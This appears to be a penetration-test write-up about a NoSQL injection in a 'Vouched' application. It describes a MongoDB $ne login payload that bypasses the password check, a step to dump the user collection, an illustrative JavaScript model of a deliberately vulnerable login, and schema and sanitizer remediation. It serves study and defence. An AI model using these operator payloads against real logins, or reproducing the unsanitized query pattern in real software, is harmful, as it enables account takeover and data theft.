Objective: To identify and exploit NoSQL injection vulnerabilities within the “Vouched” application to bypass authentication and extract sensitive user data.

1. The Vulnerability: NoSQL Injection, i.e. Improper Neutralization of Special Elements in Data Query Logic (CWE-943)

NoSQL injection occurs when an application fails to validate or sanitize user input before using it in a database query. In document-oriented databases like MongoDB, query filters are themselves JSON-like documents, so a request field that is passed through as an object rather than a plain string becomes part of the query syntax. This allows an attacker to supply query operators (e.g., $gt, $ne) in place of a literal value and manipulate the query logic, leading to unauthorized data access or authentication bypass.

2. Technical Execution: Logic Manipulation

Using Postman, I crafted malicious JSON payloads targeting the authentication and search endpoints of the Vouched application. By replacing standard string inputs with MongoDB operator objects, I successfully manipulated the database logic to return records that should have been restricted, effectively bypassing Bcrypt-hashed password checks.

| Component | Value | Purpose |
| --- | --- | --- |
| Attack Vector | JSON Payload Injection | Injecting MongoDB operators into API requests. |
| Target Endpoint | /api/v1/login | Attempting to bypass password verification. |
| Impact | Authentication Bypass | Gaining access to any user account without a password. |
| Remediation | Schema Validation | Implementing strict typing for all incoming data. |

3. Execution Workflow

  1. Endpoint Enumeration: Used Postman to identify API endpoints that accept JSON input for database queries.
  2. Operator Testing: Injected basic logical operators (e.g., {"$ne": null}) to test if the database would return unintended results.
  3. Authentication Bypass: Crafted a login request where the password field was replaced with a “not equal” operator, allowing login as any user whose username was known.
  4. Data Exfiltration: Leveraged the injection vulnerability on search endpoints to dump the entire user collection.

4. Exploit Payload (JSON)

Malicious login payload, sent as the JSON request body:

{
  "username": "admin",
  "password": { "$ne": "wrong_password" }
}

This bypasses the Bcrypt check because the password field is no longer a string to be hashed and compared. The filter now reads "username is admin AND the stored password value is not equal to wrong_password", which the admin's stored hash trivially satisfies, so the query returns the first matching user (admin) and the hash comparison is never reached.
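To make the mechanism from sections 1 and 4 concrete, the following is an added example (not code from the Vouched application or this write-up): a toy in-memory matcher that mimics how a MongoDB filter is evaluated, just enough to show why an operator object in the password field turns an equality check into "match anything". The USERS collection, the usernames and the placeholder hash strings are constructed for the example; only the implicit equality, $eq, $ne and $gt operators are modelled.

```javascript
// Added example, not from the Vouched write-up: a minimal model of MongoDB
// filter evaluation, used to show how an operator object changes a query.

// Constructed sample collection. The "hashes" are placeholders standing in
// for real bcrypt digests; their exact value does not matter to the logic.
const USERS = [
  { _id: 1, username: 'admin', password: '$2b$10$PLACEHOLDER_HASH_FOR_ADMIN' },
  { _id: 2, username: 'alice', password: '$2b$10$PLACEHOLDER_HASH_FOR_ALICE' },
];

// True when a value is a plain object whose keys all begin with '$'. This is
// how the query engine tells an operator expression apart from a literal.
function isOperatorObject(v) {
  if (v === null || typeof v !== 'object' || Array.isArray(v)) return false;
  const keys = Object.keys(v);
  return keys.length > 0 && keys.every((k) => k.startsWith('$'));
}

// Evaluate one field condition against the stored field value.
function fieldMatches(stored, cond) {
  if (!isOperatorObject(cond)) return stored === cond; // literal: equality
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case '$eq': return stored === arg;
      case '$ne': return stored !== arg;
      case '$gt': return stored > arg;
      default: throw new Error(`unsupported operator ${op}`);
    }
  });
}

// findOne(): first document where every field in the filter matches.
function findOne(collection, filter) {
  const hit = collection.find((doc) =>
    Object.entries(filter).every(([field, cond]) => fieldMatches(doc[field], cond)),
  );
  return hit === undefined ? null : hit;
}

// The vulnerable pattern: request-body values are placed straight into the
// filter, so the client controls the *shape* of the query, not just its values.
function vulnerableLogin(body) {
  return findOne(USERS, { username: body.username, password: body.password });
}

// Honest attempt with a wrong password: nothing matches.
console.log(vulnerableLogin({ username: 'admin', password: 'wrong_password' })); // null

// The section 4 payload: {$ne: 'wrong_password'} is true for the stored hash,
// so the admin document is returned and no hash comparison ever runs.
console.log(vulnerableLogin({ username: 'admin', password: { $ne: 'wrong_password' } }).username);

// {$gt: ''} matches any non-empty string: a different operator, same outcome.
console.log(vulnerableLogin({ username: 'admin', password: { $gt: '' } }).username);
```

The point of the model is the first line of fieldMatches: the engine only performs equality when the condition is a literal, so whether a login check is an equality test or a tautology is decided by the JSON type the client sent, not by anything the application wrote.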

5. Evidence of Work

[Figure: NoSQL Vulnerability]
*Caption: Initial discovery phase showing the identification of NoSQL-vulnerable endpoints in the Vouched application.*

[Figure: Postman Exploit (left) | Audit Config (right)]
*Caption: Successful authentication bypass via Postman (Left) and the subsequent database audit configuration analysis (Right).*

6. Professional Impact

This project highlights a critical oversight in modern web development. Bcrypt provides strong hashing, but hashing cannot protect against logic-level vulnerabilities when the lookup query itself is compromised: authentication is decided by which document the query returns, before any hash comparison runs. To remediate this, I recommended the implementation of strict Mongoose schemas and the use of query sanitizers to ensure that user input is never interpreted as a database operator.